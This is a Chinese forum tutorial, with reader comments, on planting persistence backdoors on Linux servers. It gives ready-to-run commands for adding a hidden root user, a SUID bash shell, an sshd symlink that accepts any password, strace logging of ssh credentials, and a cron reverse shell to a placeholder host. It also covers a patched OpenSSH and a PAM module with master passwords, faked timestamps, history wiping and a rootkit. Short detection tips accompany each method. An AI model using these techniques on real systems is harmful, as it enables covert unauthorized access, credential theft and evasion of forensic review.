【大白分享】渗透安全之Linux权限维持后门铸造篇

大家好，我是大白，正所谓夏色倚青艾，粽香礼佳人。依旧感谢各位小伙伴的一路支持与陪伴，同时也祝各位小伙伴端午节快乐！！！！

*本篇章将本着学习的态度进行分享，严禁用于个人非法行为以及黑产获取！！！！

今天分享大白的渗透安全之Linux权限维持后门铸造篇，上一篇我们分享的是Linux后门隐藏篇，那么本次是针对Linux系统的后门铸造篇，同样还是对于好多小伙伴来说，这个更加偏向于安服，总体来说确实更加偏向于安服但是对于安全知识的了解以及更加层次的学习甚至使用都比较重要，我们可以一同研习一下渗透攻防的“魅力”。

那我们开始今天的分享：

一句话添加用户和密码

添加普通用户：

1. # 创建一个用户名guest，密码123456的普通用户
   
2. useradd -p `openssl passwd -1 -salt 'salt' 123456` guest
   
3. 
   
4. # useradd -p 方法  ` ` 是用来存放可执行的系统命令,"$()"也可以存放命令执行语句
   
5. useradd -p "$(openssl passwd -1 123456)" guest
   
6. 
   
7. # chpasswd方法
   
8. useradd guest;echo 'guest:123456'|chpasswd
   
9. 
   
10. # echo -e方法
    
11. useradd test;echo -e "123456\n123456\n" |passwd test

复制代码

添加root用户：

1. # 创建一个用户名guest，密码123456的root用户
   
2. useradd -p `openssl passwd -1 -salt 'salt' 123456` guest -o -u 0 -g root -G root -s /bin/bash -d /home/test

复制代码

可疑用户排查技巧：

1. # 查询特权用户特权用户(uid 为0)
   
2. [root@localhost ~]# awk -F: '$3==0{print $1}' /etc/passwd
   
3. # 查询可以远程登录的帐号信息
   
4. [root@localhost ~]# awk '/\$1|\$6/{print $1}' /etc/shadow
   
5. # 除root帐号外，其他帐号是否存在sudo权限。如非管理需要，普通帐号应删除sudo权限
   
6. [root@localhost ~]# more /etc/sudoers | grep -v "^#\|^[        DISCUZ_CODE_2        ]quot; | grep "ALL=(ALL)"

复制代码

SUID Shell

Suid shell是一种可用于以拥有者权限运行的shell。

1. 配合普通用户权限使用
   
2. cp /bin/bash /tmp/shell
   
3. chmod u+s /tmp/shell

复制代码

使用guest用户登录就可疑获取root权限。

备注：bash2针对suid做了一些防护措施，需要使用-p参数来获取一个root shell。另外，普通用户执行这个SUID shell时，一定要使用全路径。

排查技巧：

1. # 在Linux中查找SUID设置的文件
   
2. find . -perm /4000
   
3. # 在Linux中查找使用SGID设置的文件
   
4. find . -perm /2000
   
5. # 取消s权限
   
6. chmod u-s /tmp/shell

复制代码

ssh公私钥免密登录

在客户端上生成一对公私钥，然后把公钥放到服务器上（~/.ssh/authorized_keys），保留私钥。当ssh登录时，ssh程序会发送私钥去和服务器上的公钥做匹配。如果匹配成功就可以登录了。

客户端：

1. ssh-keygen -t rsa
   

复制代码

过程中按三次回车，执行结束如下图:

进入/root/.ssh/文件夹，查看文件夹的内容，如下所示：

其中 id_rsa为私钥，id_rsa.pub为公钥，接下来打开id_rsa.pub，将内容复制到服务器。将id_rsa.pub的内容追加到/root/.ssh/authorized_keys内，配置完成。

排查技巧：查看/root/.ssh/authorized_keys是否被修改。

软连接

在sshd服务配置运行PAM认证的前提下，PAM配置文件中控制标志为sufficient时只要pam_rootok模块检测uid为0即root权限即可成功认证登陆。通过软连接的方式，实质上PAM认证是通过软连接的文件名 /tmp/su 在/etc/pam.d/目录下寻找对应的PAM配置文件(如: /etc/pam.d/su)，任意密码登陆的核心是auth sufficient pam_rootok.so，所以只要PAM配置文件中包含此配置即可SSH任意密码登陆，除了su中之外还有chsh、chfn同样可以。

在目标服务器上执行一句话后门：

1. ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=8888

复制代码

执行完之后，任何一台机器ssh root@IP -p 8888，输入任意密码，成功登录。

排查技巧：

1. # ls -al /usr/sbin/sshd
   
2. # cat /usr/sbin/sshd
   
3. 可通过重装ssh服务恢复。

复制代码

strace后门

通过命令替换动态跟踪系统调用和数据，可以用来记录用户ssh、su、sudo的操作。

1. #vim /etc/bashrc
   
2. alias ssh='strace -o /tmp/.ssh.log -e read,write,connect -s 2048 ssh'
   
3. # source /root/.bashrc

复制代码

排查技巧：使用alias即可发现异常。

crontab反弹shell

crontab命令用于设置周期性被执行的指令。新建shell脚本，利用脚本进行反弹。

a、创建shell脚本，例如在/etc/evil.sh

1. #!/bin/bash
   
2. bash -i >& /dev/tcp/IP地址/端口 0>&1

复制代码

b、crontab -e 设置定时任务

1. #每一分钟执行一次
   
2. */1 * * * * root /etc/evil.sh

复制代码

重启crond服务，service crond restart，然后就可以用nc接收shell。

排查技巧：

1. # 查看可疑的定时任务列表
   
2. crontab -e

复制代码

openssh后门

利用openssh后门，设置SSH后门密码及root密码记录位置，隐蔽性较强，不易被发现。

1. a、备份SSH配置文件
   
2. mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
   
3. mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old
   
4. 
   
5. b、解压并安装补丁
   
6. tar zxf openssh-5.9p1.tar.gz
   
7. tar zxf openssh-5.9p1.tar.gz
   
8. cp openssh-5.9p1.patch/sshbd5.9p1.diff  /openssh-5.9p1
   
9. cd openssh-5.9p1
   
10. patch < sshbd5.9p1.diff
    
11. 
    
12. c、记录用户名和密码的文件位置及其密码
    
13. vi  includes.h
    
14.     #define ILOG "/tmp/1.txt"             //记录登录本机的用户名和密码
    
15.     #define OLOG "/tmp/2.txt"             //记录本机登录远程的用户名和密码
    
16.     #define SECRETPW "123456789"          //后门的密码
    
17. 
    
18. d、修改版本信息
    
19. vi version.h
    
20.     #define SSH_VERSION "填入之前记下来的版本号,伪装原版本"
    
21.     #define SSH_PORTABLE "小版本号"
    
22. 
    
23. e、安装并编译
    
24. ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5
    
25. make clean
    
26. make && make install
    
27. service sshd restart
    
28. 
    
29. f、对比原来的配置文件，使配置文件一致，然后修改文件日期。
    
30. 
    
31. touch -r  /etc/ssh/ssh_config.old /etc/ssh/ssh_config
    
32. touch -r  /etc/ssh/sshd_config.old /etc/ssh/sshd_config
    
33. 
    
34. g、清除操作记录
    
35. export HISTFILE=/dev/null
    
36. export HISTSIZE=0
    
37. echo >/root/.bash_history //清空操作日志
    

复制代码

排查技巧：利用strace找出ssh后门.

1. # 1、获取可疑进程PI
   
2. ps aux | grep sshd
   
3. # 2、跟踪sshd PID
   
4. strace -o aa -ff -p  PID
   
5. # 3、查看记录密码打开文件
   
6. grep open sshd* | grep -v -e No -e  null -e denied| grep  WR

复制代码

PAM后门

PAM 是由Sun提出的一种认证机制。它通过提供一些动态链接库和一套统一的API，将系统提供的服务和该服务的认证方式分开，使得系统管理员可以灵活地根据需要给不同的服务配置不同的认证方式而无需更改服务程序，同时也便于向系统中添加新的认证手段。PAM最初是集成在Solaris中，目前已移植到其它系统中，如Linux、SunOS、HP-UX 9.0等。

利用方法:

1. 1、获取目标系统所使用的PAM版本，下载对应版本的pam版本
   
2. 2、解压缩，修改pam_unix_auth.c文件，添加万能密码
   
3. 3、编译安装PAM
   
4. 4、编译完后的文件在：modules/pam_unix/.libs/pam_unix.so，复制到/lib64/security中进行替换，即可使用万能密码登陆，并将用户名密码记录到文件中。

复制代码

排查技巧：

1. # 1、通过Strace跟踪ssh
   
2. ps axu | grep sshd
   
3. strace -o aa -ff -p PID
   
4. grep open aa* | grep -v -e No -e null -e denied| grep WR
   
5. # 2、检查pam_unix.so的修改时间
   
6. stat /lib/security/pam_unix.so      #32位
   
7. stat /lib64/security/pam_unix.so    #64位

复制代码

rookit后门

Mafix是一款常用的轻量应用级别Rootkits，是通过伪造ssh协议漏洞实现远程登陆的特点是配置简单并可以自定义验证密码和端口号。

利用方法：安装完成后，使用ssh 用户@IP -P 配置的端口，即可远程登录。

连接后的截图：

排查技巧：查看端口是否异常，RPM check查看命令是否被替换。

*本篇章将本着学习的态度进行分享，严禁用于个人非法行为以及黑产获取，网络不是法外之地！！！！

以上就是本次的渗透安全之Windows权限维持后门隐藏篇，一句忠告：业务备份一时不做一时爽，问题出现两行泪，感谢大佬们的参阅，此贴先到这里后续会带上更加实用的帖子，感谢大家！

励志分享超清壁纸语句~~：

《端午日》唐·殷尧藩：

少年佳节倍多情，老去谁知感慨生。

不效艾符趋习俗，但祈蒲酒话升平。

鬓丝日日添白头，榴锦年年照眼明。

千载贤愚同瞬息，几人湮没几垂名。

好的今天就到这里，老样子，感谢各位大神的参阅，孩子为了挣豆子不容易，孩子家里穷没豆子吃饭了！！！

楼主的文章图文并茂，清晰易懂，看完这波操作可以轻松上手了，如遇到问题再向楼主请教~

楼主的文章图文并茂，清晰易懂，看完这波操作可以轻松上手了，如遇到问题再向楼主请教~

每日打卡学习，感谢分享，学习了！！！

学习到了，有助于工作！

老婆，用你发财的小手申购下茅台

多谢楼主分享VPN的搭建方法，学习了。